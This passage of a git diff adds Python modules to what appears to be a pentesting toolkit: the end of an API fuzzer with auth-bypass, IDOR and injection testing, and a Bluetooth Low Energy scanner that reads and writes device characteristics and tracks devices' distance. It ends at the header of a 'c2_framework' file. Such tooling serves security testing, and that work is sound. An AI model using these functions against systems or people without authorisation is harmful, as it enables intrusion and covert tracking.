self.session.headers[header_name] = value + + def clear_auth(self): + """Clear authentication.""" + if self.session: + self.session.headers.pop('Authorization', None) + self.session.auth = None + self.session.cookies.clear() + + # ── Endpoint Discovery ─────────────────────────────────────────────── + + def discover_endpoints(self, base_url: str, custom_paths: List[str] = None, + threads: int = 10) -> str: + """Discover API endpoints. Returns job_id.""" + job_id = f'discover_{int(time.time())}' + self._jobs[job_id] = { + 'type': 'discover', 'status': 'running', + 'found': [], 'checked': 0, 'total': 0 + } + + def _discover(): + paths = COMMON_ENDPOINTS + (custom_paths or []) + self._jobs[job_id]['total'] = len(paths) + found = [] + + def check_path(path): + try: + url = urljoin(base_url.rstrip('/') + '/', path.lstrip('/')) + resp = self.session.get(url, timeout=5, allow_redirects=False) + self._jobs[job_id]['checked'] += 1 + + if resp.status_code < 404: + entry = { + 'path': path, + 'url': url, + 'status': resp.status_code, + 'content_type': resp.headers.get('content-type', ''), + 'size': len(resp.content), + 'methods': [] + } + + # Check allowed methods via OPTIONS + try: + opts = self.session.options(url, timeout=3) + allow = opts.headers.get('Allow', '') + if allow: + entry['methods'] = [m.strip() for m in allow.split(',')] + except Exception: + pass + + found.append(entry) + except Exception: + self._jobs[job_id]['checked'] += 1 + + # Thread pool + active_threads = [] + for path in paths: + t = threading.Thread(target=check_path, args=(path,)) + t.start() + active_threads.append(t) + if len(active_threads) >= threads: + for at in active_threads: + at.join(timeout=10) + active_threads.clear() + + for t in active_threads: + t.join(timeout=10) + + self._jobs[job_id]['found'] = found + self._jobs[job_id]['status'] = 'complete' + + threading.Thread(target=_discover, daemon=True).start() + return job_id + + def parse_openapi(self, url_or_path: str) -> Dict: + """Parse OpenAPI/Swagger spec to extract endpoints.""" + try: + if url_or_path.startswith('http'): + resp = self.session.get(url_or_path, timeout=10) + spec = resp.json() + else: + with open(url_or_path) as f: + spec = json.load(f) + + endpoints = [] + paths = spec.get('paths', {}) + for path, methods in paths.items(): + for method, details in methods.items(): + if method.upper() in ('GET', 'POST', 'PUT', 'DELETE', 'PATCH', 'OPTIONS'): + params = [] + for p in details.get('parameters', []): + params.append({ + 'name': p.get('name'), + 'in': p.get('in'), + 'required': p.get('required', False), + 'type': p.get('schema', {}).get('type', 'string') + }) + endpoints.append({ + 'path': path, + 'method': method.upper(), + 'summary': details.get('summary', ''), + 'parameters': params, + 'tags': details.get('tags', []) + }) + + return { + 'ok': True, + 'title': spec.get('info', {}).get('title', ''), + 'version': spec.get('info', {}).get('version', ''), + 'endpoints': endpoints, + 'count': len(endpoints) + } + except Exception as e: + return {'ok': False, 'error': str(e)} + + # ── Parameter Fuzzing ──────────────────────────────────────────────── + + def fuzz_params(self, url: str, method: str = 'GET', + params: Dict = None, payload_type: str = 'type_confusion') -> Dict: + """Fuzz API parameters with various payloads.""" + if not self.session: + return {'ok': False, 'error': 'requests not available'} + + if payload_type == 'sqli': + payloads = SQLI_PAYLOADS + elif payload_type == 'xss': + payloads = XSS_PAYLOADS + elif payload_type == 'traversal': + payloads = TRAVERSAL_PAYLOADS + else: + payloads = TYPE_CONFUSION + + params = params or {} + findings = [] + + for param_name, original_value in params.items(): + for payload in payloads: + fuzzed = copy.deepcopy(params) + fuzzed[param_name] = payload + + try: + if method.upper() == 'GET': + resp = self.session.get(url, params=fuzzed, timeout=10) + else: + resp = self.session.request(method.upper(), url, json=fuzzed, timeout=10) + + # Analyze response for anomalies + finding = self._analyze_fuzz_response( + resp, param_name, payload, payload_type + ) + if finding: + findings.append(finding) + + except RequestException as e: + if 'timeout' not in str(e).lower(): + findings.append({ + 'param': param_name, + 'payload': str(payload), + 'type': 'error', + 'detail': str(e) + }) + + return {'ok': True, 'findings': findings, 'tested': len(params) * len(payloads)} + + def _analyze_fuzz_response(self, resp, param: str, payload, payload_type: str) -> Optional[Dict]: + """Analyze response for vulnerability indicators.""" + body = resp.text.lower() + finding = None + + # SQL error detection + sql_errors = [ + 'sql syntax', 'mysql_fetch', 'pg_query', 'sqlite3', + 'unclosed quotation', 'unterminated string', 'syntax error', + 'odbc', 'oracle error', 'microsoft ole db', 'ora-0' + ] + if payload_type == 'sqli' and any(e in body for e in sql_errors): + finding = { + 'param': param, 'payload': str(payload), + 'type': 'sqli', 'severity': 'high', + 'detail': 'SQL error in response', + 'status': resp.status_code + } + + # XSS reflection + if payload_type == 'xss' and str(payload).lower() in body: + finding = { + 'param': param, 'payload': str(payload), + 'type': 'xss_reflected', 'severity': 'high', + 'detail': 'Payload reflected in response', + 'status': resp.status_code + } + + # Path traversal + if payload_type == 'traversal': + traversal_indicators = ['root:', '/bin/', 'windows\\system32', '[boot loader]'] + if any(t in body for t in traversal_indicators): + finding = { + 'param': param, 'payload': str(payload), + 'type': 'path_traversal', 'severity': 'critical', + 'detail': 'File content in response', + 'status': resp.status_code + } + + # Server error (500) might indicate injection + if resp.status_code == 500 and not finding: + finding = { + 'param': param, 'payload': str(payload), + 'type': 'server_error', 'severity': 'medium', + 'detail': f'Server error (500) triggered', + 'status': resp.status_code + } + + # Stack trace / debug info disclosure + debug_indicators = [ + 'traceback', 'stacktrace', 'exception', 'debug', + 'at line', 'file "/', 'internal server error' + ] + if any(d in body for d in debug_indicators) and not finding: + finding = { + 'param': param, 'payload': str(payload), + 'type': 'info_disclosure', 'severity': 'medium', + 'detail': 'Debug/stack trace in response', + 'status': resp.status_code + } + + return finding + + # ── Auth Testing ───────────────────────────────────────────────────── + + def test_idor(self, url_template: str, id_range: Tuple[int, int], + auth_token: str = None) -> Dict: + """Test for IDOR by iterating IDs.""" + findings = [] + start_id, end_id = id_range + + if auth_token: + self.session.headers['Authorization'] = f'Bearer {auth_token}' + + for i in range(start_id, end_id + 1): + url = url_template.replace('{id}', str(i)) + try: + resp = self.session.get(url, timeout=5) + if resp.status_code == 200: + findings.append({ + 'id': i, 'url': url, + 'status': resp.status_code, + 'size': len(resp.content), + 'accessible': True + }) + elif resp.status_code not in (401, 403, 404): + findings.append({ + 'id': i, 'url': url, + 'status': resp.status_code, + 'accessible': False, + 'note': f'Unexpected status: {resp.status_code}' + }) + except Exception: + pass + + return { + 'ok': True, 'findings': findings, + 'accessible_count': sum(1 for f in findings if f.get('accessible')), + 'tested': end_id - start_id + 1 + } + + def test_auth_bypass(self, url: str) -> Dict: + """Test common auth bypass techniques.""" + bypasses = [] + + tests = [ + ('No auth header', {}), + ('Empty Bearer', {'Authorization': 'Bearer '}), + ('Bearer null', {'Authorization': 'Bearer null'}), + ('Bearer undefined', {'Authorization': 'Bearer undefined'}), + ('Admin header', {'X-Admin': 'true'}), + ('Internal header', {'X-Forwarded-For': '127.0.0.1'}), + ('Override method', {'X-HTTP-Method-Override': 'GET'}), + ('Original URL', {'X-Original-URL': '/admin'}), + ] + + for name, headers in tests: + try: + resp = requests.get(url, headers=headers, timeout=5) + if resp.status_code == 200: + bypasses.append({ + 'technique': name, + 'status': resp.status_code, + 'size': len(resp.content), + 'success': True + }) + else: + bypasses.append({ + 'technique': name, + 'status': resp.status_code, + 'success': False + }) + except Exception: + pass + + return { + 'ok': True, + 'bypasses': bypasses, + 'successful': sum(1 for b in bypasses if b.get('success')) + } + + # ── Rate Limiting ──────────────────────────────────────────────────── + + def test_rate_limit(self, url: str, requests_count: int = 50, + method: str = 'GET') -> Dict: + """Test API rate limiting.""" + results = [] + start_time = time.time() + + for i in range(requests_count): + try: + resp = self.session.request(method, url, timeout=10) + results.append({ + 'request_num': i + 1, + 'status': resp.status_code, + 'time': time.time() - start_time, + 'rate_limit_remaining': resp.headers.get('X-RateLimit-Remaining', ''), + 'retry_after': resp.headers.get('Retry-After', '') + }) + if resp.status_code == 429: + break + except Exception as e: + results.append({ + 'request_num': i + 1, + 'error': str(e), + 'time': time.time() - start_time + }) + + rate_limited = any(r.get('status') == 429 for r in results) + elapsed = time.time() - start_time + + return { + 'ok': True, + 'rate_limited': rate_limited, + 'total_requests': len(results), + 'elapsed_seconds': round(elapsed, 2), + 'rps': round(len(results) / elapsed, 1) if elapsed > 0 else 0, + 'limit_hit_at': next((r['request_num'] for r in results if r.get('status') == 429), None), + 'results': results + } + + # ── GraphQL ────────────────────────────────────────────────────────── + + def graphql_introspect(self, url: str) -> Dict: + """Run GraphQL introspection query.""" + query = { + 'query': ''' + { + __schema { + types { + name + kind + fields { + name + type { name kind } + args { name type { name } } + } + } + queryType { name } + mutationType { name } + } + } + ''' + } + + try: + resp = self.session.post(url, json=query, timeout=15) + data = resp.json() + + if 'errors' in data and not data.get('data'): + return {'ok': False, 'error': 'Introspection disabled or error', + 'errors': data['errors']} + + schema = data.get('data', {}).get('__schema', {}) + types = [] + for t in schema.get('types', []): + if not t['name'].startswith('__'): + types.append({ + 'name': t['name'], + 'kind': t['kind'], + 'fields': [ + {'name': f['name'], + 'type': f['type'].get('name', f['type'].get('kind', '')), + 'args': [a['name'] for a in f.get('args', [])]} + for f in (t.get('fields') or []) + ] + }) + + return { + 'ok': True, + 'query_type': schema.get('queryType', {}).get('name'), + 'mutation_type': schema.get('mutationType', {}).get('name'), + 'types': types, + 'type_count': len(types) + } + except Exception as e: + return {'ok': False, 'error': str(e)} + + def graphql_depth_test(self, url: str, max_depth: int = 10) -> Dict: + """Test GraphQL query depth limits.""" + results = [] + for depth in range(1, max_depth + 1): + # Build nested query + inner = '{ __typename }' + for _ in range(depth): + inner = f'{{ __schema {{ types {inner} }} }}' + + try: + resp = self.session.post(url, json={'query': inner}, timeout=10) + results.append({ + 'depth': depth, + 'status': resp.status_code, + 'has_errors': 'errors' in resp.json() if resp.headers.get('content-type', '').startswith('application/json') else None + }) + if resp.status_code != 200: + break + except Exception: + results.append({'depth': depth, 'error': True}) + break + + max_allowed = max((r['depth'] for r in results if r.get('status') == 200), default=0) + return { + 'ok': True, + 'max_depth_allowed': max_allowed, + 'depth_limited': max_allowed < max_depth, + 'results': results + } + + # ── Response Analysis ──────────────────────────────────────────────── + + def analyze_response(self, url: str, method: str = 'GET') -> Dict: + """Analyze API response for security issues.""" + try: + resp = self.session.request(method, url, timeout=10) + issues = [] + + # Check security headers + security_headers = { + 'X-Content-Type-Options': 'nosniff', + 'X-Frame-Options': 'DENY|SAMEORIGIN', + 'Strict-Transport-Security': None, + 'Content-Security-Policy': None, + 'X-XSS-Protection': None, + } + for header, expected in security_headers.items(): + val = resp.headers.get(header) + if not val: + issues.append({ + 'type': 'missing_header', + 'header': header, + 'severity': 'low' + }) + + # Check for info disclosure + server = resp.headers.get('Server', '') + if server and any(v in server.lower() for v in ['apache/', 'nginx/', 'iis/']): + issues.append({ + 'type': 'server_disclosure', + 'value': server, + 'severity': 'info' + }) + + powered_by = resp.headers.get('X-Powered-By', '') + if powered_by: + issues.append({ + 'type': 'technology_disclosure', + 'value': powered_by, + 'severity': 'low' + }) + + # Check CORS + cors = resp.headers.get('Access-Control-Allow-Origin', '') + if cors == '*': + issues.append({ + 'type': 'open_cors', + 'value': cors, + 'severity': 'medium' + }) + + # Check for error/debug info in body + body = resp.text.lower() + if any(kw in body for kw in ['stack trace', 'traceback', 'debug mode']): + issues.append({ + 'type': 'debug_info', + 'severity': 'medium', + 'detail': 'Debug/stack trace information in response' + }) + + return { + 'ok': True, + 'url': url, + 'status': resp.status_code, + 'headers': dict(resp.headers), + 'issues': issues, + 'issue_count': len(issues) + } + + except Exception as e: + return {'ok': False, 'error': str(e)} + + # ── Job Management ─────────────────────────────────────────────────── + + def get_job(self, job_id: str) -> Optional[Dict]: + return self._jobs.get(job_id) + + def list_jobs(self) -> List[Dict]: + return [{'id': k, **v} for k, v in self._jobs.items()] + + +# ── Singleton ──────────────────────────────────────────────────────────────── + +_instance = None + +def get_api_fuzzer() -> APIFuzzer: + global _instance + if _instance is None: + _instance = APIFuzzer() + return _instance + + +# ── CLI Interface ──────────────────────────────────────────────────────────── + +def run(): + """CLI entry point for API Fuzzer module.""" + if not HAS_REQUESTS: + print(" Error: requests library not installed") + return + + fuzzer = get_api_fuzzer() + + while True: + print(f"\n{'='*60}") + print(f" API Fuzzer") + print(f"{'='*60}") + print() + print(" 1 — Discover Endpoints") + print(" 2 — Parse OpenAPI Spec") + print(" 3 — Fuzz Parameters") + print(" 4 — Test Auth Bypass") + print(" 5 — Test IDOR") + print(" 6 — Test Rate Limiting") + print(" 7 — GraphQL Introspection") + print(" 8 — Analyze Response") + print(" 9 — Set Authentication") + print(" 0 — Back") + print() + + choice = input(" > ").strip() + + if choice == '0': + break + elif choice == '1': + base = input(" Base URL: ").strip() + if base: + job_id = fuzzer.discover_endpoints(base) + print(f" Discovery started (job: {job_id})") + while True: + job = fuzzer.get_job(job_id) + if job['status'] == 'complete': + print(f" Found {len(job['found'])} endpoints:") + for ep in job['found']: + print(f" [{ep['status']}] {ep['path']} " + f"({ep['content_type'][:30]})") + break + print(f" Checking... {job['checked']}/{job['total']}") + time.sleep(1) + elif choice == '2': + url = input(" OpenAPI spec URL or file: ").strip() + if url: + result = fuzzer.parse_openapi(url) + if result['ok']: + print(f" API: {result['title']} v{result['version']}") + print(f" Endpoints: {result['count']}") + for ep in result['endpoints'][:20]: + print(f" {ep['method']:<6} {ep['path']} {ep.get('summary', '')}") + else: + print(f" Error: {result['error']}") + elif choice == '3': + url = input(" Endpoint URL: ").strip() + param_str = input(" Parameters (key=val,key=val): ").strip() + ptype = input(" Payload type (sqli/xss/traversal/type_confusion): ").strip() or 'type_confusion' + if url and param_str: + params = dict(p.split('=', 1) for p in param_str.split(',') if '=' in p) + result = fuzzer.fuzz_params(url, params=params, payload_type=ptype) + if result['ok']: + print(f" Tested {result['tested']} combinations, {len(result['findings'])} findings:") + for f in result['findings']: + print(f" [{f.get('severity', '?')}] {f['type']}: {f['param']} = {f['payload'][:50]}") + elif choice == '4': + url = input(" Protected URL: ").strip() + if url: + result = fuzzer.test_auth_bypass(url) + print(f" Tested {len(result['bypasses'])} techniques, {result['successful']} successful") + for b in result['bypasses']: + status = 'BYPASSED' if b['success'] else f'blocked ({b["status"]})' + print(f" {b['technique']}: {status}") + elif choice == '6': + url = input(" URL to test: ").strip() + count = input(" Request count (default 50): ").strip() + if url: + result = fuzzer.test_rate_limit(url, int(count) if count.isdigit() else 50) + print(f" Rate limited: {result['rate_limited']}") + print(f" RPS: {result['rps']} | Total: {result['total_requests']} in {result['elapsed_seconds']}s") + if result['limit_hit_at']: + print(f" Limit hit at request #{result['limit_hit_at']}") + elif choice == '7': + url = input(" GraphQL URL: ").strip() + if url: + result = fuzzer.graphql_introspect(url) + if result['ok']: + print(f" Found {result['type_count']} types") + for t in result['types'][:10]: + print(f" {t['kind']}: {t['name']} ({len(t['fields'])} fields)") + else: + print(f" Error: {result['error']}") + elif choice == '8': + url = input(" URL: ").strip() + if url: + result = fuzzer.analyze_response(url) + if result['ok']: + print(f" Status: {result['status']} | Issues: {result['issue_count']}") + for issue in result['issues']: + print(f" [{issue['severity']}] {issue['type']}: {issue.get('value', issue.get('detail', ''))}") + elif choice == '9': + auth_type = input(" Auth type (bearer/api_key/basic/cookie): ").strip() + value = input(" Value: ").strip() + if auth_type and value: + fuzzer.set_auth(auth_type, value) + print(" Authentication configured") diff --git a/modules/ble_scanner.py b/modules/ble_scanner.py new file mode 100644 index 0000000..a71199a --- /dev/null +++ b/modules/ble_scanner.py @@ -0,0 +1,555 @@ +"""AUTARCH BLE Scanner + +Bluetooth Low Energy device discovery, service enumeration, characteristic +read/write, vulnerability scanning, and proximity tracking. +""" + +DESCRIPTION = "BLE device scanning & security analysis" +AUTHOR = "darkHal" +VERSION = "1.0" +CATEGORY = "analyze" + +import os +import re +import json +import time +import threading +from pathlib import Path +from datetime import datetime, timezone +from typing import Dict, List, Optional, Any + +try: + from core.paths import get_data_dir +except ImportError: + def get_data_dir(): + return str(Path(__file__).parent.parent / 'data') + +# Optional BLE library +try: + import asyncio + from bleak import BleakScanner, BleakClient + HAS_BLEAK = True +except ImportError: + HAS_BLEAK = False + + +# ── Known Service UUIDs ────────────────────────────────────────────────────── + +KNOWN_SERVICES = { + '00001800-0000-1000-8000-00805f9b34fb': 'Generic Access', + '00001801-0000-1000-8000-00805f9b34fb': 'Generic Attribute', + '0000180a-0000-1000-8000-00805f9b34fb': 'Device Information', + '0000180f-0000-1000-8000-00805f9b34fb': 'Battery Service', + '00001812-0000-1000-8000-00805f9b34fb': 'Human Interface Device', + '0000180d-0000-1000-8000-00805f9b34fb': 'Heart Rate', + '00001809-0000-1000-8000-00805f9b34fb': 'Health Thermometer', + '00001802-0000-1000-8000-00805f9b34fb': 'Immediate Alert', + '00001803-0000-1000-8000-00805f9b34fb': 'Link Loss', + '00001804-0000-1000-8000-00805f9b34fb': 'Tx Power', + '00001805-0000-1000-8000-00805f9b34fb': 'Current Time', + '00001808-0000-1000-8000-00805f9b34fb': 'Glucose', + '00001810-0000-1000-8000-00805f9b34fb': 'Blood Pressure', + '00001813-0000-1000-8000-00805f9b34fb': 'Scan Parameters', + '00001816-0000-1000-8000-00805f9b34fb': 'Cycling Speed & Cadence', + '00001818-0000-1000-8000-00805f9b34fb': 'Cycling Power', + '00001814-0000-1000-8000-00805f9b34fb': 'Running Speed & Cadence', + '0000fee0-0000-1000-8000-00805f9b34fb': 'Mi Band Service', + '0000feaa-0000-1000-8000-00805f9b34fb': 'Eddystone (Google)', +} + +MANUFACTURER_IDS = { + 0x004C: 'Apple', + 0x0006: 'Microsoft', + 0x000F: 'Texas Instruments', + 0x0059: 'Nordic Semiconductor', + 0x0075: 'Samsung', + 0x00E0: 'Google', + 0x0157: 'Xiaomi', + 0x0171: 'Amazon', + 0x02FF: 'Huawei', + 0x0310: 'Fitbit', +} + +KNOWN_VULNS = { + 'KNOB': { + 'description': 'Key Negotiation of Bluetooth Attack — downgrades encryption key entropy', + 'cve': 'CVE-2019-9506', + 'severity': 'high', + 'check': 'Requires active MITM during pairing' + }, + 'BLESA': { + 'description': 'BLE Spoofing Attack — reconnection spoofing without auth', + 'cve': 'CVE-2020-9770', + 'severity': 'medium', + 'check': 'Affects reconnection after disconnect' + }, + 'SweynTooth': { + 'description': 'Family of BLE implementation bugs causing crashes/deadlocks', + 'cve': 'Multiple (CVE-2019-16336, CVE-2019-17519, etc.)', + 'severity': 'high', + 'check': 'Vendor-specific, requires firmware version check' + }, + 'BlueBorne': { + 'description': 'Remote code execution via Bluetooth without pairing', + 'cve': 'CVE-2017-0781 to CVE-2017-0785', + 'severity': 'critical', + 'check': 'Requires classic BT stack, pre-2018 devices vulnerable' + } +} + + +# ── BLE Scanner ────────────────────────────────────────────────────────────── + +class BLEScanner: + """Bluetooth Low Energy device scanner and analyzer.""" + + def __init__(self): + self.data_dir = os.path.join(get_data_dir(), 'ble') + os.makedirs(self.data_dir, exist_ok=True) + self.devices: Dict[str, Dict] = {} + self.tracking_history: Dict[str, List[Dict]] = {} + self._scan_running = False + + def is_available(self) -> bool: + """Check if BLE scanning is available.""" + return HAS_BLEAK + + def get_status(self) -> Dict: + """Get scanner status.""" + return { + 'available': HAS_BLEAK, + 'devices_found': len(self.devices), + 'scanning': self._scan_running, + 'tracking': len(self.tracking_history) + } + + # ── Scanning ───────────────────────────────────────────────────────── + + def scan(self, duration: float = 10.0) -> Dict: + """Scan for BLE devices.""" + if not HAS_BLEAK: + return {'ok': False, 'error': 'bleak library not installed (pip install bleak)'} + + self._scan_running = True + + try: + loop = asyncio.new_event_loop() + devices = loop.run_until_complete(self._async_scan(duration)) + loop.close() + + results = [] + for dev in devices: + info = self._parse_device(dev) + self.devices[info['address']] = info + results.append(info) + + self._scan_running = False + return { + 'ok': True, + 'devices': results, + 'count': len(results), + 'duration': duration + } + + except Exception as e: + self._scan_running = False + return {'ok': False, 'error': str(e)} + + async def _async_scan(self, duration: float): + """Async BLE scan.""" + devices = await BleakScanner.discover(timeout=duration, return_adv=True) + return devices + + def _parse_device(self, dev_adv) -> Dict: + """Parse BLE device advertisement data.""" + if isinstance(dev_adv, tuple): + dev, adv = dev_adv + else: + dev = dev_adv + adv = None + + info = { + 'address': str(dev.address) if hasattr(dev, 'address') else str(dev), + 'name': dev.name if hasattr(dev, 'name') else 'Unknown', + 'rssi': dev.rssi if hasattr(dev, 'rssi') else (adv.rssi if adv and hasattr(adv, 'rssi') else 0), + 'services': [], + 'manufacturer': 'Unknown', + 'device_type': 'unknown', + 'connectable': True, + 'last_seen': datetime.now(timezone.utc).isoformat(), + } + + # Parse advertisement data + if adv: + # Service UUIDs + if hasattr(adv, 'service_uuids'): + for uuid in adv.service_uuids: + service_name = KNOWN_SERVICES.get(uuid.lower(), uuid) + info['services'].append({'uuid': uuid, 'name': service_name}) + + # Manufacturer data + if hasattr(adv, 'manufacturer_data'): + for company_id, data in adv.manufacturer_data.items(): + info['manufacturer'] = MANUFACTURER_IDS.get(company_id, f'ID: {company_id:#06x}') + info['manufacturer_data'] = data.hex() if isinstance(data, bytes) else str(data) + + # TX Power + if hasattr(adv, 'tx_power'): + info['tx_power'] = adv.tx_power + + # Classify device type + info['device_type'] = self._classify_device(info) + + return info + + def _classify_device(self, info: Dict) -> str: + """Classify device type from services and name.""" + name = (info.get('name') or '').lower() + services = [s['uuid'].lower() for s in info.get('services', [])] + + if any('1812' in s for s in services): + return 'hid' # keyboard/mouse + if any('180d' in s for s in services): + return 'fitness' + if any('180f' in s for s in services): + if 'headphone' in name or 'airpod' in name or 'buds' in name: + return 'audio' + if any('fee0' in s for s in services): + return 'wearable' + if info.get('manufacturer') == 'Apple': + if 'watch' in name: + return 'wearable' + if 'airpod' in name: + return 'audio' + return 'apple_device' + if 'tv' in name or 'chromecast' in name or 'roku' in name: + return 'media' + if 'lock' in name or 'door' in name: + return 'smart_lock' + if 'light' in name or 'bulb' in name or 'hue' in name: + return 'smart_light' + if 'beacon' in name or any('feaa' in s for s in services): + return 'beacon' + if 'tile' in name or 'airtag' in name or 'tracker' in name: + return 'tracker' + return 'unknown' + + # ── Device Detail ──────────────────────────────────────────────────── + + def get_device_detail(self, address: str) -> Dict: + """Connect to device and enumerate services/characteristics.""" + if not HAS_BLEAK: + return {'ok': False, 'error': 'bleak not installed'} + + try: + loop = asyncio.new_event_loop() + result = loop.run_until_complete(self._async_detail(address)) + loop.close() + return result + except Exception as e: + return {'ok': False, 'error': str(e)} + + async def _async_detail(self, address: str) -> Dict: + """Async device detail enumeration.""" + async with BleakClient(address) as client: + services = [] + for service in client.services: + svc = { + 'uuid': service.uuid, + 'name': KNOWN_SERVICES.get(service.uuid.lower(), service.description or service.uuid), + 'characteristics': [] + } + for char in service.characteristics: + ch = { + 'uuid': char.uuid, + 'description': char.description or char.uuid, + 'properties': char.properties, + 'value': None + } + # Try to read if readable + if 'read' in char.properties: + try: + val = await client.read_gatt_char(char.uuid) + ch['value'] = val.hex() if isinstance(val, bytes) else str(val) + # Try UTF-8 decode + try: + ch['value_text'] = val.decode('utf-8') + except (UnicodeDecodeError, AttributeError): + pass + except Exception: + ch['value'] = '' + + svc['characteristics'].append(ch) + services.append(svc) + + return { + 'ok': True, + 'address': address, + 'connected': True, + 'services': services, + 'service_count': len(services), + 'char_count': sum(len(s['characteristics']) for s in services) + } + + def read_characteristic(self, address: str, char_uuid: str) -> Dict: + """Read a specific characteristic value.""" + if not HAS_BLEAK: + return {'ok': False, 'error': 'bleak not installed'} + + try: + loop = asyncio.new_event_loop() + result = loop.run_until_complete(self._async_read(address, char_uuid)) + loop.close() + return result + except Exception as e: + return {'ok': False, 'error': str(e)} + + async def _async_read(self, address: str, char_uuid: str) -> Dict: + async with BleakClient(address) as client: + val = await client.read_gatt_char(char_uuid) + return { + 'ok': True, + 'address': address, + 'characteristic': char_uuid, + 'value_hex': val.hex(), + 'value_bytes': list(val), + 'size': len(val) + } + + def write_characteristic(self, address: str, char_uuid: str, + data: bytes) -> Dict: + """Write to a characteristic.""" + if not HAS_BLEAK: + return {'ok': False, 'error': 'bleak not installed'} + + try: + loop = asyncio.new_event_loop() + result = loop.run_until_complete(self._async_write(address, char_uuid, data)) + loop.close() + return result + except Exception as e: + return {'ok': False, 'error': str(e)} + + async def _async_write(self, address: str, char_uuid: str, data: bytes) -> Dict: + async with BleakClient(address) as client: + await client.write_gatt_char(char_uuid, data) + return {'ok': True, 'address': address, 'characteristic': char_uuid, + 'written': len(data)} + + # ── Vulnerability Scanning ─────────────────────────────────────────── + + def vuln_scan(self, address: str = None) -> Dict: + """Check for known BLE vulnerabilities.""" + vulns = [] + + for vuln_name, vuln_info in KNOWN_VULNS.items(): + entry = { + 'name': vuln_name, + 'description': vuln_info['description'], + 'cve': vuln_info['cve'], + 'severity': vuln_info['severity'], + 'status': 'check_required', + 'note': vuln_info['check'] + } + vulns.append(entry) + + # Device-specific checks + if address and address in self.devices: + dev = self.devices[address] + manufacturer = dev.get('manufacturer', '') + + # Apple devices with older firmware + if manufacturer == 'Apple': + vulns.append({ + 'name': 'Apple BLE Tracking', + 'description': 'Apple devices broadcast continuity messages that can be tracked', + 'severity': 'info', + 'status': 'detected' if 'apple_device' in dev.get('device_type', '') else 'not_applicable', + 'note': 'Apple continuity protocol leaks device info' + }) + + # Devices without encryption + for svc in dev.get('services', []): + if 'immediate alert' in svc.get('name', '').lower(): + vulns.append({ + 'name': 'Unauthenticated Alert Service', + 'description': 'Immediate Alert service accessible without pairing', + 'severity': 'low', + 'status': 'detected', + 'note': 'Can trigger alerts on device without authentication' + }) + + return { + 'ok': True, + 'address': address, + 'vulnerabilities': vulns, + 'vuln_count': len(vulns) + } + + # ── Proximity Tracking ─────────────────────────────────────────────── + + def track_device(self, address: str) -> Dict: + """Record RSSI for proximity tracking.""" + if address not in self.devices: + return {'ok': False, 'error': 'Device not found. Run scan first.'} + + dev = self.devices[address] + rssi = dev.get('rssi', 0) + tx_power = dev.get('tx_power', -59) # default TX power + + # Estimate distance (rough path-loss model) + if rssi != 0: + ratio = rssi / tx_power + if ratio < 1.0: + distance = pow(ratio, 10) + else: + distance = 0.89976 * pow(ratio, 7.7095) + 0.111 + else: + distance = -1 + + entry = { + 'timestamp': datetime.now(timezone.utc).isoformat(), + 'rssi': rssi, + 'estimated_distance_m': round(distance, 2), + 'tx_power': tx_power + } + + if address not in self.tracking_history: + self.tracking_history[address] = [] + self.tracking_history[address].append(entry) + + return { + 'ok': True, + 'address': address, + 'name': dev.get('name', 'Unknown'), + 'current': entry, + 'history_count': len(self.tracking_history[address]) + } + + def get_tracking_history(self, address: str) -> List[Dict]: + """Get tracking history for a device.""" + return self.tracking_history.get(address, []) + + # ── Persistence ────────────────────────────────────────────────────── + + def save_scan(self, name: str = None) -> Dict: + """Save current scan results.""" + name = name or f'scan_{int(time.time())}' + filepath = os.path.join(self.data_dir, f'{name}.json') + with open(filepath, 'w') as f: + json.dump({ + 'timestamp': datetime.now(timezone.utc).isoformat(), + 'devices': list(self.devices.values()), + 'count': len(self.devices) + }, f, indent=2) + return {'ok': True, 'path': filepath, 'count': len(self.devices)} + + def list_scans(self) -> List[Dict]: + """List saved scans.""" + scans = [] + for f in Path(self.data_dir).glob('*.json'): + try: + with open(f) as fh: + data = json.load(fh) + scans.append({ + 'name': f.stem, + 'path': str(f), + 'timestamp': data.get('timestamp', ''), + 'count': data.get('count', 0) + }) + except Exception: + pass + return scans + + def get_devices(self) -> List[Dict]: + """Get all discovered devices.""" + return list(self.devices.values()) + + +# ── Singleton ──────────────────────────────────────────────────────────────── + +_instance = None + +def get_ble_scanner() -> BLEScanner: + global _instance + if _instance is None: + _instance = BLEScanner() + return _instance + + +# ── CLI Interface ──────────────────────────────────────────────────────────── + +def run(): + """CLI entry point for BLE Scanner module.""" + scanner = get_ble_scanner() + + while True: + status = scanner.get_status() + print(f"\n{'='*60}") + print(f" BLE Scanner (bleak: {'OK' if status['available'] else 'MISSING'})") + print(f"{'='*60}") + print(f" Devices found: {status['devices_found']}") + print() + print(" 1 — Scan for Devices") + print(" 2 — View Devices") + print(" 3 — Device Detail (connect)") + print(" 4 — Vulnerability Scan") + print(" 5 — Track Device (proximity)") + print(" 6 — Save Scan") + print(" 7 — List Saved Scans") + print(" 0 — Back") + print() + + choice = input(" > ").strip() + + if choice == '0': + break + elif choice == '1': + dur = input(" Scan duration (seconds, default 10): ").strip() + result = scanner.scan(float(dur) if dur else 10.0) + if result['ok']: + print(f" Found {result['count']} devices:") + for dev in result['devices']: + print(f" {dev['address']} {dev.get('name', '?'):<20} " + f"RSSI={dev['rssi']} {dev['device_type']} ({dev['manufacturer']})") + else: + print(f" Error: {result['error']}") + elif choice == '2': + devices = scanner.get_devices() + for dev in devices: + print(f" {dev['address']} {dev.get('name', '?'):<20} " + f"RSSI={dev['rssi']} {dev['device_type']}") + elif choice == '3': + addr = input(" Device address: ").strip() + if addr: + result = scanner.get_device_detail(addr) + if result['ok']: + print(f" Services: {result['service_count']} Characteristics: {result['char_count']}") + for svc in result['services']: + print(f" [{svc['name']}]") + for ch in svc['characteristics']: + val = ch.get('value_text', ch.get('value', '')) + print(f" {ch['description']} props={ch['properties']} val={val}") + else: + print(f" Error: {result['error']}") + elif choice == '4': + addr = input(" Device address (blank=general): ").strip() or None + result = scanner.vuln_scan(addr) + for v in result['vulnerabilities']: + print(f" [{v['severity']:<8}] {v['name']}: {v['description'][:60]}") + elif choice == '5': + addr = input(" Device address: ").strip() + if addr: + result = scanner.track_device(addr) + if result['ok']: + c = result['current'] + print(f" RSSI: {c['rssi']} Distance: ~{c['estimated_distance_m']}m") + else: + print(f" Error: {result['error']}") + elif choice == '6': + name = input(" Scan name (blank=auto): ").strip() or None + result = scanner.save_scan(name) + print(f" Saved {result['count']} devices") + elif choice == '7': + for s in scanner.list_scans(): + print(f" {s['name']} ({s['count']} devices) {s['timestamp']}") diff --git a/modules/c2_framework.py b/modules/c2_framework.py new file mode 100644 index 0000000..4a2e696 --- 